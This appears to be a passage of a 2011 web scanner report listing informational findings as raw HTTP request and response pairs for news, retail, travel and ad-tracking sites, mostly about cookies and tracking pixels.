HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 9763 Content-Type: application/x-javascript Last-Modified: Tue, 02 Nov 2010 13:29:19 GMT Accept-Ranges: bytes ETag: "8021d7f3917acb1:2af" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:34 GMT Connection: close /* SWFObject v2.1 <http://code.google.com/p Copyright (c) 2007-2008 Geoff Stearns, Michael Williams, and Bobby van der Sluis This software is released under the MIT License <http://www ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua |
GET /ver1.0/Content/ua Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 185752 Content-Type: application/x-javascript Last-Modified: Sun, 15 May 2011 08:43:23 GMT Accept-Ranges: bytes ETag: "80c73426dc12cc1:2af" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:19:47 GMT Connection: close (function(window ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Stats/Tracker.gif |
GET /ver1.0/Stats/Tracker.gif Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SiteLifeHost=gnvm6l3 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Cache-Control: no-cache Pragma: no-cache Content-Length: 0 Content-Encoding: deflate Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 x-SiteLife-host: gnvm4l3pluckcom Set-Cookie: SiteLifeHost=gnvm4l3 Date: Mon, 16 May 2011 01:28:20 GMT Connection: close |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/USAT/pluck |
GET /ver1.0/USAT/pluck Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449798794; path=/ Cache-Control: private Content-Length: 30408 Content-Type: text/css Last-Modified: Sun, 15 May 2011 08:31:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 x-SiteLife-host: gnvm6l3pluckcom Set-Cookie: SiteLifeHost=gnvm6l3 Set-Cookie: anonId=81fbd51d-fba0-4197 Date: Mon, 16 May 2011 01:19:46 GMT Connection: close /************************ * * CSS control - DO NOT CHANGE OR REMOVE * needed to track loading of this css file * ************************* .pluck-comments-css ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/USAT/pluck/pluck |
GET /ver1.0/USAT/pluck/pluck Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449690983; path=/ Cache-Control: private Content-Length: 34563 Content-Type: text/css Last-Modified: Sun, 15 May 2011 08:27:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 x-SiteLife-host: gnvm3l3pluckcom Set-Cookie: SiteLifeHost=gnvm3l3 Set-Cookie: anonId=ea7d33cf-ffc2-4016 Date: Mon, 16 May 2011 01:19:46 GMT Connection: close /************************ * * CSS control - DO NOT CHANGE OR REMOVE * needed to track loading of this css file * ************************* .pluck-css-loaded { /* DO NOT ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/sys/jsonp.app |
GET /ver1.0/sys/jsonp.app Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Cache-Control: private Content-Length: 89538 Content-Type: application/javascript Vary: Content-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 x-SiteLife-host: gnvm4l3pluckcom Set-Cookie: SiteLifeHost=gnvm4l3 Date: Mon, 16 May 2011 01:29:50 GMT Connection: close plcb0('\r\n\r\n<div class=\"pluck-app ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/usat/pluck |
GET /ver1.0/usat/pluck Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Cache-Control: private Content-Length: 37055 Content-Type: application/x-javascript Last-Modified: Sun, 15 May 2011 08:42:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 x-SiteLife-host: gnvm4l3pluckcom Set-Cookie: SiteLifeHost=gnvm4l3 Date: Mon, 16 May 2011 01:20:44 GMT Connection: close // Plugin to contain scripts frequently used across multiple widgets // Minipersona, report abuse, that sort of thing. pluckAppProxy.regist // init function, c ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/usat/pluck/pluck |
GET /ver1.0/usat/pluck/pluck Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Cache-Control: private Content-Length: 53489 Content-Type: application/x-javascript Last-Modified: Sun, 15 May 2011 08:42:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 x-SiteLife-host: gnvm4l3pluckcom Set-Cookie: SiteLifeHost=gnvm4l3 Date: Mon, 16 May 2011 01:20:35 GMT Connection: close // Plugin to contain scripts frequently used across multiple widgets // Minipersona, report abuse, that sort of thing. pluckAppProxy.regist // init function, called fir ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sony.tcliveus.com |
Path: | /i |
GET /i?siteID=501&ts Host: sony.tcliveus.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.sonystyle.com Cookie: TCID=0007afb9-cead-2156 |
HTTP/1.1 200 OK Cache-control: no-cache, private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="http://www Connection: Keep-Alive Content-Length: 43 Last-Modified: Sun, 15 May 2011 21:20:48 GMT Content-Type: image/gif Date: Sun, 15 May 2011 21:20:48 GMT Set-Cookie: NSC_Tpo`=445b326b7863 GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sync.mathtag.com |
Path: | /sync/img |
GET /sync/img?mt_exid=11&type Host: sync.mathtag.com Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uuid=4dd07bc8-e97b-118c |
HTTP/1.1 302 Found Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x1 pid 0x1c72 7282 Cache-Control: no-cache P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Date: Mon, 16 May 2011 01:26:25 GMT Location: http://bh.contextweb.com Etag: 4dd07bc8-e97b-118c-3dec Connection: Keep-Alive Set-Cookie: ts=1305509185; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:26:25 GMT Content-Length: 0 |
Severity: | Information |
Confidence: | Certain |
Host: | http://t.invitemedia.com |
Path: | /track_imp |
GET /track_imp?partnerID=9 Host: t.invitemedia.com Proxy-Connection: keep-alive Referer: http://ad.yieldmanager User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: exchange_uid="eyI0Ij |
HTTP/1.0 200 OK Server: IM BidManager Date: Mon, 16 May 2011 01:26:58 GMT P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Expires: Mon, 16-May-2011 01:26:38 GMT Content-Type: image/gif Pragma: no-cache Cache-Control: no-cache Set-Cookie: subID="{}"; Domain=invitemedia.com; expires=Tue, 15-May-2012 01:26:58 GMT; Path=/ Set-Cookie: impressions="{\"594387\": [1305509218+ \"c76fa991-e8e9-36fa-8db6 Set-Cookie: camp_freq_p1="eJzjku Set-Cookie: io_freq_p1="eJzjEufo Content-Length: 43 GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://tag.admeld.com |
Path: | /ad/js/201/unitedstates |
GET /ad/js/201/unitedstates Host: tag.admeld.com Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: meld_sess=d96a784e-8901 |
HTTP/1.1 200 OK Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Length: 727 Content-Type: application/javascript Date: Mon, 16 May 2011 01:19:58 GMT Connection: close Set-Cookie: D41U=3YG_-W4iqwAOfqF P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT" document.write("<div style='width:728px,height document.write(unescape(' ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://tag.contextweb.com |
Path: | /TagPublish/getad.aspx |
GET /TagPublish/getad.aspx Host: tag.contextweb.com Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cwbh1=2532%3B06%2F14 |
HTTP/1.1 302 Moved Temporarily Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" CW-Server: CW-WEB28 Location: /TagPublish/STB.htm Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 173 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Vary: Accept-Encoding Date: Mon, 16 May 2011 01:20:42 GMT Connection: close Set-Cookie: V=8vciuQJMXXJY; domain=.contextweb.com; expires=Wed, 16-May-2012 01:20:42 GMT; path=/ <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="/TagPublish/STB.htm </body></html> |
Severity: | Information |
Confidence: | Certain |
Host: | http://tags.bluekai.com |
Path: | /site/2948 |
GET /site/2948?phint=idswap Host: tags.bluekai.com Proxy-Connection: keep-alive Referer: http://tags.bluekai.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bkp1=; bku=cQ6991Cf6W6Oh0NB; bkou=KJhMRsOQRsq |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:39:27 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: bklc=4dd0804f; expires=Wed, 18-May-2011 01:39:27 GMT; path=/; domain=.bluekai.com Set-Cookie: bk=e/5GeOcyjISd8JkA; expires=Sat, 12-Nov-2011 01:39:27 GMT; path=/; domain=.bluekai.com Set-Cookie: bkc=KJhgTVjQIwsWAVam Set-Cookie: bkst=KJhMR5Mwhze9pkY Set-Cookie: bkdc=res; expires=Tue, 17-May-2011 01:39:27 GMT; path=/; domain=.bluekai.com P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags Expires: Tue, 17 May 2011 01:39:27 GMT Cache-Control: max-age=86400, private BK-Server: d08b Content-Length: 62 Content-Type: image/gif GIF89a.............!. |
Severity: | Information |
Confidence: | Certain |
Host: | http://tags.bluekai.com |
Path: | /site/3358 |
GET /site/3358?id=8vciuQ Host: tags.bluekai.com Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bk=0E0bL1V5c/sd8JkA; bkc=KJpM8sJQteV5QKaW |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:26:43 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: bklc=4dd07d53; expires=Wed, 18-May-2011 01:26:43 GMT; path=/; domain=.bluekai.com Set-Cookie: bk=uiT+m1V5c/sd8JkA; expires=Sat, 12-Nov-2011 01:26:43 GMT; path=/; domain=.bluekai.com Set-Cookie: bkc=KJpM8sJQteV5QKau Set-Cookie: bkst=KJhMRjeMjVeQRq9 Set-Cookie: bkdc=res; expires=Tue, 17-May-2011 01:26:43 GMT; path=/; domain=.bluekai.com P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags Expires: Tue, 17 May 2011 01:26:43 GMT Cache-Control: max-age=86400, private BK-Server: c53d Content-Length: 62 Content-Type: image/gif GIF89a.............!. |
Severity: | Information |
Confidence: | Certain |
Host: | http://web.aisle7.net |
Path: | /jsapi/1.0/content.js |
GET /jsapi/1.0/content.js HTTP/1.1 Host: web.aisle7.net Proxy-Connection: keep-alive Referer: http://www.gnc.com/home User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:43:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: public Last-Modified: Wed, 11 May 2011 22:12:18 GMT Content-Type: text/javascript Content-Length: 71512 Set-Cookie: aisle7c6=4090937773.1 if (!window['$hnj'] || !$hnj.registry.included(' (function(){var W=this,ab,F=W.jQuery,S=W. ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://webtrends |
Path: | /dcsshgbi400000gscd6 |
GET /dcsshgbi400000gscd6 Host: webtrends.telegraph.co.uk Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WT_FPC=id=173.193.214.243 |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 01:19:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: ACOOKIE=C8ctADE3My4x P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Pragma: no-cache Expires: -1 Cache-Control: no-cache Content-type: image/gif Content-Length: 67 GIF89a................... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.imiclk.com |
Path: | /cgi/r.cgi |
GET /cgi/r.cgi?m=3&mid Host: www.imiclk.com Proxy-Connection: keep-alive Referer: http://www.armaniexchange User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: YU=593390c429fc100c2 |
HTTP/1.1 200 OK Server: Apache/2.0.63 (CentOS) P3P: policyref="/w3c/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT" Cache-Control: no-store Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 224 Date: Mon, 16 May 2011 01:43:17 GMT Connection: close Set-Cookie: CH=24785,53brJ,22244 Set-Cookie: RQ=1267,53br0,2831,53br0 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2//EN"><html><head> <img src="http://pixel.mathtag ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mcafeesecure |
Path: | /ads/1002/25 |
GET /ads/1002/25 HTTP/1.1 Host: www.mcafeesecure.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmx=185732405.; __utmxx=185732405.; __utmz=185732405 |
HTTP/1.1 302 Found Server: McAfeeSecure Vary: Accept-Encoding Location: http://www.siteadvisor Set-Cookie: adclick=1002-25; domain=.mcafeesecure.com; path=/; expires=Mon, 13-Jun-2011 01:39:27 GMT Content-Type: text/html; charset=utf-8 Content-Length: 96 Connection: close Date: Mon, 16 May 2011 01:39:27 GMT The URL has moved <a href="http://www |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.mcafeesecure |
Path: | /RatingVerify |
GET /RatingVerify?ref=www Host: www.mcafeesecure.com Connection: keep-alive Referer: https://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmx=185732405.; __utmxx=185732405.; __utmz=185732405 |
HTTP/1.1 200 OK Server: McAfeeSecure Vary: Accept-Encoding Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Set-Cookie: CAMEFROM=www.fingerhut Content-Type: text/html; charset=utf-8 Content-Length: 10809 Connection: close Date: Mon, 16 May 2011 01:37:34 GMT <html> <head> <!-- Google Website Optimizer Control Script --> <script> function utmx_section(){}function utmx(){} (function(){var k='1568676568',d=document ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.orbitz.com |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 Host: www.orbitz.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NSC_JOsvdl03ebxvuujc |
HTTP/1.1 200 OK Last-Modified: Wed, 11 May 2011 17:00:39 GMT ETag: "1536-4a30303185bc0" Cache-Control: max-age=31536000 Expires: Sun, 13 May 2012 14:35:59 GMT Content-Type: image/x-icon Content-Length: 5430 Server: Apache head: yes Date: Mon, 16 May 2011 01:29:49 GMT Age: 125630 Connection: keep-alive Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe ............ .h...&... .... .........(....... ..... .....@................... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.passporte |
Path: | /forums/ |
GET /forums/ HTTP/1.1 Host: www.passporterboards.com Proxy-Connection: keep-alive Referer: http://www.passporte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bbsessionhash=cf5022 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:31:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.17 Set-Cookie: bblastvisit=1305508789; expires=Tue, 15-May-2012 01:31:56 GMT; path=/; domain=.passporterboards Set-Cookie: bblastactivity=0; expires=Tue, 15-May-2012 01:31:56 GMT; path=/; domain=.passporterboards Cache-Control: private Pragma: private Content-Type: text/html; charset=ISO-8859-1 X-UA-Compatible: IE=7 Set-Cookie: vbseo_loggedin=deleted; expires=Sun, 16-May-2010 01:31:55 GMT; path=/ Content-Length: 162646 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.revresda.com |
Path: | /js.ng/channel=blog |
GET /js.ng/channel=blog Host: www.revresda.com Proxy-Connection: keep-alive Referer: http://www.orbitz.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:19:59 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: NGUserID=aeb2623-13012 AdServer: egadserv004p.prod.orbitz P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR" Cteonnt-Length: 874 Content-Type: application/x-javascript Cache-Control: private Content-Length: 874 Set-Cookie: NSC_xxx.sfwsfteb.dpn.80 document.write('<a target=\"_top\" href=\"http://www ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.sonystyle.com |
Path: | /webapp/wcs/stores |
GET /webapp/wcs/stores Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.sonystyle.com Cookie: TS5bbf46=7383fa36127 |
HTTP/1.1 200 OK Cteonnt-Length: 105431 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 105431 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:21:13 GMT Connection: close Set-Cookie: WC_PERSISTENT=CBnCTN Set-Cookie: WC_USERACTIVITY_239700472 Set-Cookie: WC_ACTIVEPOINTER=%2d1 Set-Cookie: WC_USERACTIVITY_239700473 Set-Cookie: TS5bbf46=394e9935c8a Cache-Control: private Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: No-cache <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <!-- AllSitesHeadInclude --> <script type="text/javascript" src="//nexus2.e ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.sonystyle.com |
Path: | /webapp/wcs/stores |
GET /webapp/wcs/stores User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.sonystyle.com Cookie: JSESSIONID=0000e Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Cteonnt-Length: 4641 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 4641 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:20:23 GMT Connection: close Set-Cookie: WC_SESSION_ESTABLISHED Set-Cookie: WC_PERSISTENT=54QQoW Set-Cookie: WC_ACTIVEPOINTER=%2d1 Set-Cookie: WC_USERACTIVITY_-1002= Set-Cookie: WC_GENERIC_ACTIVITYDATA= Set-Cookie: TS5bbf46=216db8a284d Cache-Control: private Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta id="meta_refresh" ht ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.sonystyle.com |
Path: | /webapp/wcs/stores |
GET /webapp/wcs/stores Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: http://www.sonystyle.com Cookie: TS5bbf46=b8fba18f1f5 |
HTTP/1.1 200 OK ntCoent-Length: 4641 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 4641 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:22:00 GMT Connection: keep-alive Set-Cookie: WC_AUTHENTICATION Set-Cookie: TS5bbf46=59f0262ca39 Cache-Control: private Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta id="meta_refresh" ht ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://disneycruise |
Path: | /reservations/customize |
GET /reservations/customize Host: disneycruise.disney.go Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=854018943 |
